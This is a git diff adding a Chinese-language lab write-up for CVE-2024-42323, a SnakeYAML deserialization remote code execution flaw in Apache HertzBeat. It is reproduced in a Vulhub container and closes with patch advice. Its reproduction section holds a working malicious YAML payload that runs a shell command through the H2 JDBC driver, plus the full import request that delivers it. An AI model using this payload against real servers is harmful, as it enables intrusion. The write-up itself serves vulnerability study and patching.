diff --git a/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md b/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md new file mode 100644 index 0000000..8a7ad68 --- /dev/null +++ b/Web应用漏洞/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323.md @@ -0,0 +1,80 @@ +# Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323 + +## 漏洞描述 + +Apache HertzBeat 是一款开源的实时监控告警工具,支持对操作系统、中间件、数据库等多种对象进行监控,并提供 Web 界面进行管理。 + +在 1.6.0 版本之前,HertzBeat 使用了存在安全漏洞的 SnakeYAML 库来解析 YAML 文件。当已认证用户通过 `/api/monitors/import` 或 `/api/alert/defines/import` 接口导入新的监控类型时,可以提供特制的 YAML 内容触发不受信任数据的反序列化,最终可能导致在目标系统上执行远程代码。 + +参考链接: + +- https://forum.butian.net/article/612 +- https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx + +## 漏洞影响 + +``` +Apache HertzBeat < 1.6.0 +``` + +## 环境搭建 + +Vulhub 执行如下命令启动存在漏洞的 HertzBeat 1.4.4 服务器: + +``` +docker compose up -d +``` + +服务启动后,访问 `http://your-ip:1157/dashboard` 进入 HertzBeat 控制面板。默认登录凭据为: + +- 用户名:`admin` +- 密码:`hertzbeat` + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090855824.png) + +## 漏洞复现 + +首先,准备一个恶意 YAML 文件,文件名必须以 `.yaml` 结尾,内容如下: + +```yaml +!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ] +``` + +然后登录 HertzBeat 后台,导航到任意监控页面并找到导入按钮,在这里将上面的恶意 YAML 文件导入: + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311090950864.png) + +HertzBeat 对 YAML 文件进行反序列化时,触发远程代码执行: + +``` +POST /api/monitors/import HTTP/1.1 +Host: your-ip:1157 +Accept-Encoding: gzip, deflate +Accept-Language: en-US +Origin: http://your-ip:1157 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6788.76 Safari/537.36 +Accept: application/json, text/plain, */* +Referer: http://your-ip:1157/monitors +sec-ch-ua-platform: "Windows" +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvl3ne8kWpIEZzrNr +Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw1jMsKwjAQRf9l1h0wj8akvyIuMs4I8dFKJhVB_HdT0OU593LecGkFJjjFwMLkMPlzQp8dY2S3QwqUKFg23hIMoCv1c-Z7mTsV1U66VplFFdtylRlV6lPqtuYGk9l7E8bReTuAvB5_EdMm6nKTXjj8gsfPF5W5Kao.lj6IwR1vmaTc2T0t2VJlwOCTMJeu4tlOejqygKjtlHV-vj2Ew2Cw5ljUv-9pGxDB_yKnfrKp89i4QhYoQAs8vA +Content-Length: 456 + +------WebKitFormBoundaryvl3ne8kWpIEZzrNr +Content-Disposition: form-data; name="file"; filename="test.yaml" +Content-Type: application/x-yaml + +!!org.h2.jdbc.JdbcConnection [ "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException { Runtime.getRuntime().exec(\"touch /tmp/awesome_poc\")\\; }$$\\;CALL EXEC ()\\;", [], "a", "b", false ] + +------WebKitFormBoundaryvl3ne8kWpIEZzrNr-- +``` + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091514662.png) + +命令成功执行: + +![](images/Apache%20HertzBeat%20SnakeYaml%20反序列化远程代码执行漏洞%20CVE-2024-42323/image-20250311091629839.png) + +## 漏洞修复 + +目前官方已有可更新版本,建议受影响用户升级至最新版本 Apache Hertbeat >= 1.6.0。官方下载地址: https://hertzbeat.apache.org/zh-cn/docs/download/ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png new file mode 100644 index 0000000..3e2ad15 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090855824.png differ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png new file mode 100644 index 0000000..a91568b Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311090950864.png differ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png new file mode 100644 index 0000000..01eb5f4 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091514662.png differ diff --git a/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png new file mode 100644 index 0000000..f54df65 Binary files /dev/null and b/Web应用漏洞/images/Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323/image-20250311091629839.png differ